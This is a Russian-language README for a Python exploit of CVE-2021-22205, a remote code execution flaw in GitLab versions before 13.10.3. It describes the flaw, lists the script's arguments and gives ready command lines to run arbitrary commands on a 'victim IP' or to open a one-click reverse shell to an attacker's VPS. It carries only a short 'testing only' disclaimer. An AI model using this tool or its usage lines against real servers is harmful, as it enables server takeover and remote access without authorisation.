
Скрипт эксплойта на Python для CVE-2021-22205 (GitLab RCE) с возможностями выполнения команд и reverse shell. Поддерживает получение шелла в один клик для тестирования на проникновение.
Из-за того, что GitLab неправильно проверяет файлы изображений, передаваемые парсеру, возникает выполнение команд. Злоумышленник может сконструировать вредоносный запрос и выполнить произвольные команды в целевой системе, что в итоге приводит к захвату сервера GitLab. Поскольку в большинстве скриптов в сети отсутствует функция реверс-шелла, был доработан существующий скрипт и добавлена функция одного выстрела для получения шелла.
______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
\____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
[-p PORT]
GitLab < 13.10.3 RCE
optional arguments:
-h, --help показать это сообщение и выйти
-t TARGET, --target TARGET
Целевой URL
-c COMMAND, --command COMMAND
Команда для выполнения
--shell Включить реверс-шелл
-i IP, --ip IP IP-адрес для реверс-шелла
-p PORT, --port PORT Порт для реверс-шелла
python3 CVE-2021-22205.py -t [IP жертвы] --shell -i [IP VPS] -p [порт VPS] // реверс-шелл
python3 CVE-2021-22205.py -t [IP жертвы] -c [команда] // выполнить команду
Данный скрипт предназначен только для тестирования, не используйте его в других целях.